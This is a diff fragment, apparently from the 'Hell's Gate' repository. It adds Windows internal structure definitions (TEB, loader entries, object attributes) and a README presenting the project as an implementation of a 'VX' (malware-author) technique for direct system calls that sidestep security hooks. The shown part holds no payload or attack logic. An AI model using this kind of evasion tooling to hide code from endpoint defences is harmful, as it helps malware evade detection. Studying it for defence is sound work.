+		USHORT CrossTebFlags;
+	};
+	union
+	{
+		struct
+		{
+			USHORT DbgSafeThunkCall : 1;
+			USHORT DbgInDebugPrint : 1;
+			USHORT DbgHasFiberData : 1;
+			USHORT DbgSkipThreadAttach : 1;
+			USHORT DbgWerInShipAssertCode : 1;
+			USHORT DbgIssuedInitialBp : 1;
+			USHORT DbgClonedThread : 1;
+			USHORT SpareSameTebBits : 9;
+		};
+		USHORT SameTebFlags;
+	};
+	PVOID TxnScopeEntercallback;
+	PVOID TxnScopeExitCAllback;
+	PVOID TxnScopeContext;
+	ULONG LockCount;
+	ULONG ProcessRundown;
+	ULONG64 LastSwitchTime;
+	ULONG64 TotalSwitchOutTime;
+	LARGE_INTEGER WaitReasonBitMap;
+#else
+	BOOLEAN SafeThunkCall;
+	BOOLEAN BooleanSpare[3];
+#endif
+} TEB, * PTEB;
+
+typedef struct _LDR_DATA_TABLE_ENTRY {
+	LIST_ENTRY InLoadOrderLinks;
+	LIST_ENTRY InMemoryOrderLinks;
+	LIST_ENTRY InInitializationOrderLinks;
+	PVOID DllBase;
+	PVOID EntryPoint;
+	ULONG SizeOfImage;
+	UNICODE_STRING FullDllName;
+	UNICODE_STRING BaseDllName;
+	ULONG Flags;
+	WORD LoadCount;
+	WORD TlsIndex;
+	union {
+		LIST_ENTRY HashLinks;
+		struct {
+			PVOID SectionPointer;
+			ULONG CheckSum;
+		};
+	};
+	union {
+		ULONG TimeDateStamp;
+		PVOID LoadedImports;
+	};
+	PACTIVATION_CONTEXT EntryPointActivationContext;
+	PVOID PatchInformation;
+	LIST_ENTRY ForwarderLinks;
+	LIST_ENTRY ServiceTagLinks;
+	LIST_ENTRY StaticLinks;
+} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
+
+typedef struct _OBJECT_ATTRIBUTES {
+	ULONG Length;
+	PVOID RootDirectory;
+	PUNICODE_STRING ObjectName;
+	ULONG Attributes;
+	PVOID SecurityDescriptor;
+	PVOID SecurityQualityOfService;
+} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
+
+typedef struct _INITIAL_TEB {
+	PVOID                StackBase;
+	PVOID                StackLimit;
+	PVOID                StackCommit;
+	PVOID                StackCommitMax;
+	PVOID                StackReserved;
+} INITIAL_TEB, * PINITIAL_TEB;
@@ -0,0 +1,21 @@
+## Hell's Gate ##
+
+Original C Implementation of the Hell's Gate VX Technique
+<br />
+<br />
+Link to the paper: https://vxug.fakedoma.in/papers/hells-gate.pdf
+<br /> PDF also included in this repository.
+<br />
+<br />
+Authors:
+* Paul Laîné (@am0nsec)
+* smelly__vx (@RtlMateusz)
+<br />
+
+### Update  ###
+Please note:
+* We are not claiming that this is ground-breaking as many people have been using this kind of technique for many years;
+* We are not claiming that this is the perfect and most optimised way to archive the objective. This is just one example on how to implementation the technique;
+* Judging the idea/technique/project/research solely on the name is petty to say the least and definitively childish; and
+* Any recommendation and/or ideas will always be welcome, just open an issue in this repository.
+